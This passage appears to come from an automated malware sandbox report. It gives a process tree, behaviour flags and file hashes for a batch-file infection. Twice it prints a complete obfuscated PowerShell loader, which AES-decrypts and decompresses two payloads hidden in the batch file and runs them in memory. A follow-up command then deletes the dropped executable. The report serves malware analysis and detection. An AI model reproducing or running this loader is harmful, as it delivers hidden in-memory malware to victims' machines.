C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Roaming\iwebbh.bat2⤵
- Suspicious use of WriteProcessMemory
PID:2872 -
C:\Users\Admin\AppData\Roaming\iwebbh.bat.exe"C:\Users\Admin\AppData\Roaming\iwebbh.bat.exe" -w hidden -c $ZiYB='TWHQYraWHQYnsWHQYfoWHQYrmFiWHQYnalWHQYBloWHQYckWHQY'.Replace('WHQY', '');$TWWf='CreWHQYateWHQYDeWHQYcryWHQYptWHQYorWHQY'.Replace('WHQY', '');$JFEq='LoWHQYadWHQY'.Replace('WHQY', '');$PgsW='GetWHQYCuWHQYrWHQYreWHQYntWHQYPrWHQYoWHQYceWHQYssWHQY'.Replace('WHQY', '');$tNsL='LaWHQYstWHQY'.Replace('WHQY', '');$GjzR='MaiWHQYnWHQYModuWHQYleWHQY'.Replace('WHQY', '');$aRAn='SpWHQYlitWHQY'.Replace('WHQY', '');$TNHv='IWHQYnWHQYvokWHQYeWHQY'.Replace('WHQY', '');$QZWA='EntWHQYrWHQYyPoWHQYintWHQY'.Replace('WHQY', '');$vNAk='FroWHQYmBaWHQYsWHQYe6WHQY4SWHQYtriWHQYngWHQY'.Replace('WHQY', '');$UYdq='ReWHQYaWHQYdLiWHQYnWHQYeWHQYsWHQY'.Replace('WHQY', '');$JZFz='ChWHQYangWHQYeWHQYExtWHQYensiWHQYoWHQYnWHQY'.Replace('WHQY', '');function swdxJ($huXUQ){$dLULt=[System.Security.Cryptography.Aes]::Create();$dLULt.Mode=[System.Security.Cryptography.CipherMode]::CBC;$dLULt.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$dLULt.Key=[System.Convert]::$vNAk('g+qN2trIRo/tbHFrQCd/eQDgIirzmSlbfVKkYlD3YWc=');$dLULt.IV=[System.Convert]::$vNAk('eff0gny3xfxcI+yMk6XV2Q==');$lfKNS=$dLULt.$TWWf();$QwlmH=$lfKNS.$ZiYB($huXUQ,0,$huXUQ.Length);$lfKNS.Dispose();$dLULt.Dispose();$QwlmH;}function ktBmv($huXUQ){$NioEV=New-Object System.IO.MemoryStream(,$huXUQ);$xipLu=New-Object System.IO.MemoryStream;$BScFk=New-Object System.IO.Compression.GZipStream($NioEV,[IO.Compression.CompressionMode]::Decompress);$BScFk.CopyTo($xipLu);$BScFk.Dispose();$NioEV.Dispose();$xipLu.Dispose();$xipLu.ToArray();}$zaZHN=[System.Linq.Enumerable]::$tNsL([System.IO.File]::$UYdq([System.IO.Path]::$JZFz([System.Diagnostics.Process]::$PgsW().$GjzR.FileName, $null)));$GGCVp=$zaZHN.Substring(2).$aRAn(':');$GwZBd=ktBmv (swdxJ ([Convert]::$vNAk($GGCVp[0])));$gptFX=ktBmv (swdxJ ([Convert]::$vNAk($GGCVp[1])));[System.Reflection.Assembly]::$JFEq([byte[]]$gptFX).$QZWA.$TNHv($null,$null);[System.Reflection.Assembly]::$JFEq([byte[]]$GwZBd).$QZWA.$TNHv($null,$null);3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4724 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(4724);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1672
-
-
-
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\iwebbh.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2792 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Roaming\iwebbh.bat2⤵
- Suspicious use of WriteProcessMemory
PID:2424 -
C:\Users\Admin\AppData\Roaming\iwebbh.bat.exe"C:\Users\Admin\AppData\Roaming\iwebbh.bat.exe" -w hidden -c $ZiYB='TWHQYraWHQYnsWHQYfoWHQYrmFiWHQYnalWHQYBloWHQYckWHQY'.Replace('WHQY', '');$TWWf='CreWHQYateWHQYDeWHQYcryWHQYptWHQYorWHQY'.Replace('WHQY', '');$JFEq='LoWHQYadWHQY'.Replace('WHQY', '');$PgsW='GetWHQYCuWHQYrWHQYreWHQYntWHQYPrWHQYoWHQYceWHQYssWHQY'.Replace('WHQY', '');$tNsL='LaWHQYstWHQY'.Replace('WHQY', '');$GjzR='MaiWHQYnWHQYModuWHQYleWHQY'.Replace('WHQY', '');$aRAn='SpWHQYlitWHQY'.Replace('WHQY', '');$TNHv='IWHQYnWHQYvokWHQYeWHQY'.Replace('WHQY', '');$QZWA='EntWHQYrWHQYyPoWHQYintWHQY'.Replace('WHQY', '');$vNAk='FroWHQYmBaWHQYsWHQYe6WHQY4SWHQYtriWHQYngWHQY'.Replace('WHQY', '');$UYdq='ReWHQYaWHQYdLiWHQYnWHQYeWHQYsWHQY'.Replace('WHQY', '');$JZFz='ChWHQYangWHQYeWHQYExtWHQYensiWHQYoWHQYnWHQY'.Replace('WHQY', '');function swdxJ($huXUQ){$dLULt=[System.Security.Cryptography.Aes]::Create();$dLULt.Mode=[System.Security.Cryptography.CipherMode]::CBC;$dLULt.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$dLULt.Key=[System.Convert]::$vNAk('g+qN2trIRo/tbHFrQCd/eQDgIirzmSlbfVKkYlD3YWc=');$dLULt.IV=[System.Convert]::$vNAk('eff0gny3xfxcI+yMk6XV2Q==');$lfKNS=$dLULt.$TWWf();$QwlmH=$lfKNS.$ZiYB($huXUQ,0,$huXUQ.Length);$lfKNS.Dispose();$dLULt.Dispose();$QwlmH;}function ktBmv($huXUQ){$NioEV=New-Object System.IO.MemoryStream(,$huXUQ);$xipLu=New-Object System.IO.MemoryStream;$BScFk=New-Object System.IO.Compression.GZipStream($NioEV,[IO.Compression.CompressionMode]::Decompress);$BScFk.CopyTo($xipLu);$BScFk.Dispose();$NioEV.Dispose();$xipLu.Dispose();$xipLu.ToArray();}$zaZHN=[System.Linq.Enumerable]::$tNsL([System.IO.File]::$UYdq([System.IO.Path]::$JZFz([System.Diagnostics.Process]::$PgsW().$GjzR.FileName, $null)));$GGCVp=$zaZHN.Substring(2).$aRAn(':');$GwZBd=ktBmv (swdxJ ([Convert]::$vNAk($GGCVp[0])));$gptFX=ktBmv (swdxJ ([Convert]::$vNAk($GGCVp[1])));[System.Reflection.Assembly]::$JFEq([byte[]]$gptFX).$QZWA.$TNHv($null,$null);[System.Reflection.Assembly]::$JFEq([byte[]]$GwZBd).$QZWA.$TNHv($null,$null);3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2804 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(2804);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2932
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5f41839a3fe2888c8b3050197bc9a0a05
SHA10798941aaf7a53a11ea9ed589752890aee069729
SHA256224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA5122acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
Filesize
1KB
MD52238871af228384f4b8cdc65117ba9f1
SHA12a200725f1f32e5a12546aa7fd7a8c5906757bd1
SHA256daa246f73567ad176e744abdb82d991dd8cffe0e2d847d2feefeb84f7fa5f882
SHA5121833d508fdbe2b8722b787bfc0c1848a5bcdeb7ec01e94158d78e9e6ceb397a2515d88bb8ca4ec1a810263fc900b5b1ea1d788aa103967ed61436e617fab47bf
-
Filesize
1KB
MD5b60e49309ee16b67c32abe452f30c738
SHA15796089f29b1c0f4f21e33c9f0c88c519dceb82a
SHA256e848b213b0848179e13b05ab175c375a51b2e3a49e9595169d6b0c57636310ba
SHA51225fb3e1ec76bcd78db175ea902b2040761bf2206a9914ec19b60dca313ee8df8ab10d9aa382094288926446ebf7f4610dbe25577e92671eef36adc65bc1d3ddd
-
Filesize
64B
MD5d8b9a260789a22d72263ef3bb119108c
SHA1376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
74KB
MD5eb336ada634ab05e0ee2319de53f28d9
SHA16b90b17327236357996c2cda2e341a59bbe1177f
SHA256ac9385e93103cf61717de999cb0e9ad035d311af09f0c02b1f46ef99fb5fa793
SHA512dac81bce58bc4c76acdb8e0e3c1489cd822cd65de5aa7a5b1b61c2f11e85fce52a487cabdf6ceff6d78093fa5e9237f309f903cb32637fac062773480c643e95
-
Filesize
423KB
MD5c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA25673a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA5126e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b